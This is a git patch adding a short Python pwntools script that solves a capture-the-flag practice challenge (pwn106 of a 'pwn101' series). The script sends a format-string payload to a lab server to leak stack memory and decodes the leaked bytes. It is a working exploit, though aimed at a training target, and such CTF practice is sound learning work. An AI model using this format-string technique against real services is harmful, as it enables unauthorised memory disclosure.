From 3e4988716a4660e60b86a6eb81a87f33c987a958 Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Mon, 28 Oct 2024 21:32:26 +0300
Subject: [PATCH] solve script

---
 thm_pwn101/pwn106/a.py | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 thm_pwn101/pwn106/a.py

diff --git a/thm_pwn101/pwn106/a.py b/thm_pwn101/pwn106/a.py
new file mode 100644
index 0000000..0b7067b
--- /dev/null
+++ b/thm_pwn101/pwn106/a.py
@@ -0,0 +1,19 @@
+#!/usr/bin/python3
+
+from pwn import *
+from binascii import unhexlify
+
+context.binary = target = ELF("./pwn106", checksec=False)
+# r = process()
+r = remote("10.10.74.244", 9006)
+
+# funcs
+s = lambda a: r.send(a)
+
+# buf
+s(b"%6$p.%7$p.%8$p.%9$p.%10$p.%11$p")
+r.recvuntil(b"Thanks ")
+out = b"".join([unhexlify(a[2:])[::-1] for a in r.recvS().split(".")]).decode()
+print(out)
+
+r.interactive()
\ No newline at end of file